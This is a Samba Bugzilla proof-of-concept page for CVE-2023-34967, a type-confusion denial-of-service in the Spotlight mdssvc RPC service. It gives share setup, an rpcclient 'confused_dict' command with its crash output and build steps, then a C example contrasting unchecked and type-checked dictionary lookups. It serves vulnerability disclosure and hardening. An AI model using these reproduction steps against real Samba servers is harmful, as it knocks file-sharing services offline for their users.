The Samba-Bugzilla – Attachment 17841 Details for Bug 15341: [SECURITY] CVE-2023-34967: Samba Spotlight mdssvc RPC Request Type Confusion Denial-of-Service Vulnerability
PoC Description
poc.txt (text/plain), 2.71 KB, created by Ralph Böhme on 2023-03-23 09:40:26 UTC
## Proof-Of-Concept

We extended the `rpcclient` CLI tool from the samba project's own source code with the `confused_dict` command to allow us to send a dictionary that would lead to a Type Confusion.

### Configuration

1. Create the directory for the share: `mkdir ~/sambashare`
2. Set up a new samba share in `/etc/samba/smb.conf`:

```ini
# [...]

[sambashare]
    comment = Samba on KUDU
    path = /home/user/sambashare
    read only = no
    browsable = yes
    guest ok = yes
```

3. We also suppose that a user named `user` with the password `user` was created beforehand and that this user is allowed to access the share `sambashare`.

### Usage

```bash
bin/rpcclient -U 'user' --password=user 'ncacn_np:localhost[\pipe\mdssvc]' -c "confused_dict sambashare /tmp"
Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
[DEBUG] Got an handle!
[DEBUG] command name added!
[DEBUG] sl_dict_t created!
[DEBUG] Dictionary built!
DALLOC_CTX(#1): {
    sl_array_t(#2): {
        sl_array_t(#3): {
            string: openQueryWithParams:forContext:
            uint64_t: 0xdeadbeef
            uint64_t: 0xcafebabe
        }
        sl_dict_t(#4): {
            string: kMDQueryString
            string: *
            string: kMDScopeArray
            string: AAAABBBB
        }
    }
}

dcerpc_mdssvc_cmd failed: NT_STATUS_CONNECTION_DISCONNECTED
result was NT_STATUS_CONNECTION_DISCONNECTED
```

### Patch

A series of two patches was applied against the master branch, commit: 01cdc5e00be78a51f0766634cc7fe50de2088203.

```bash
> git clone https://gitlab.com/samba-team/samba.git
> cd samba
> git apply 0001-add-the-raw_blob-command-for-the-Spotlight-RPC-in-rp.patch
> git apply 0002-add-confused_dict-command-to-rpcclient-to-trigger-th.patch
```

The patches are attached to this report.

## Build instructions

On [Ubuntu 22.10](https://wiki.samba.org/index.php/Package_Dependencies_Required_to_Build_Samba#Debian_/_Ubuntu)

```bash
> apt-get install acl attr autoconf bind9utils bison build-essential \
    debhelper dnsutils docbook-xml docbook-xsl flex gdb libjansson-dev krb5-user \
    libacl1-dev libaio-dev libarchive-dev libattr1-dev libblkid-dev libbsd-dev \
    libcap-dev libcups2-dev libgnutls28-dev libgpgme-dev libjson-perl \
    libldap2-dev libncurses5-dev libpam0g-dev libparse-yapp-perl \
    libpopt-dev libreadline-dev nettle-dev perl perl-modules pkg-config \
    python-all-dev python-crypto python-dbg python-dev python-dnspython \
    python3-dnspython python-gpgme python3-gpgme python-markdown python3-markdown \
    python3-dev xsltproc zlib1g-dev liblmdb-dev lmdb-utils
> ./configure --enable-debug
> make -j
```
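The dictionary the PoC sends carries a plain string (`AAAABBBB`) under a key named `kMDScopeArray`, and the server disconnects as soon as it processes it. The C program below is an added illustration of the underlying pattern, not Samba's mdssvc code and not the attached patches: it models a typed key/value container with an unchecked lookup beside a type-checked one, then runs the PoC's dictionary and a well-formed one through both. Every type name, function name and the two sample dictionaries are assumptions constructed for this example; the only things taken from the page are the key names and the string value.

```c
/* Added example: toy model of a Spotlight-style typed dictionary.
 * Not Samba code; names and layout are assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Type tags; in the real service the type of each value is carried by the
 * allocation, here it is an explicit field. */
typedef enum { SL_STRING = 1, SL_UINT64 = 2, SL_ARRAY = 3 } sl_type;

typedef struct sl_value {
    sl_type type;
    const char *str;               /* meaningful when type == SL_STRING */
    unsigned long long u64;        /* meaningful when type == SL_UINT64 */
    const struct sl_value *items;  /* meaningful when type == SL_ARRAY  */
    size_t nitems;
} sl_value;

typedef struct { const char *key; sl_value value; } sl_kv;
typedef struct { const sl_kv *kv; size_t n; } sl_dict;

/* Unchecked lookup, the pattern that enables type confusion: the caller
 * receives whatever the client placed under the key, of any type. */
const sl_value *sl_value_for_key(const sl_dict *d, const char *key)
{
    for (size_t i = 0; i < d->n; i++)
        if (strcmp(d->kv[i].key, key) == 0)
            return &d->kv[i].value;
    return NULL;
}

/* Checked lookup: same search, but a value of the wrong type is reported
 * exactly like a missing key, so callers never cast a string to an array. */
const sl_value *sl_value_for_key_type(const sl_dict *d, const char *key,
                                      sl_type want)
{
    const sl_value *v = sl_value_for_key(d, key);
    if (v == NULL || v->type != want)
        return NULL;
    return v;
}

/* Vulnerable consumer: assumes kMDScopeArray is an array. It returns the
 * type tag of the value it would have used as an array so the confusion is
 * observable here; a server that casts the value to an array struct instead
 * reads the string's memory as array fields and crashes. */
int scope_type_used_unchecked(const sl_dict *query)
{
    const sl_value *scope = sl_value_for_key(query, "kMDScopeArray");
    if (scope == NULL)
        return -1;
    return (int)scope->type;
}

/* Hardened consumer: refuses the request unless the value really is an
 * array, returning -1 so the caller can fail the RPC cleanly. */
int scope_count_checked(const sl_dict *query)
{
    const sl_value *scope =
        sl_value_for_key_type(query, "kMDScopeArray", SL_ARRAY);
    if (scope == NULL)
        return -1;
    return (int)scope->nitems;
}

/* Constructed inputs: the PoC's dictionary (a string where an array is
 * expected) and a well-formed one whose scope array holds one path. */
static const sl_kv poc_kv[] = {
    { "kMDQueryString", { SL_STRING, "*",        0, NULL, 0 } },
    { "kMDScopeArray",  { SL_STRING, "AAAABBBB", 0, NULL, 0 } },
};
const sl_dict poc_query = { poc_kv, 2 };

static const sl_value scope_items[] = { { SL_STRING, "/tmp", 0, NULL, 0 } };
static const sl_kv good_kv[] = {
    { "kMDQueryString", { SL_STRING, "*",  0, NULL,        0 } },
    { "kMDScopeArray",  { SL_ARRAY,  NULL, 0, scope_items, 1 } },
};
const sl_dict good_query = { good_kv, 2 };

int main(void)
{
    printf("unchecked lookup, PoC dictionary: used type tag %d (1 = string, 3 = array)\n",
           scope_type_used_unchecked(&poc_query));
    printf("checked lookup, PoC dictionary: %d (rejected)\n",
           scope_count_checked(&poc_query));
    printf("checked lookup, well-formed dictionary: %d scope entry\n",
           scope_count_checked(&good_query));
    return 0;
}
```

The point of the checked variant is where the check lives: putting it in the lookup itself, rather than at each call site, means a client-controlled dictionary cannot reach any consumer with a value of an unexpected type, and a malformed request fails with an error instead of taking the service down.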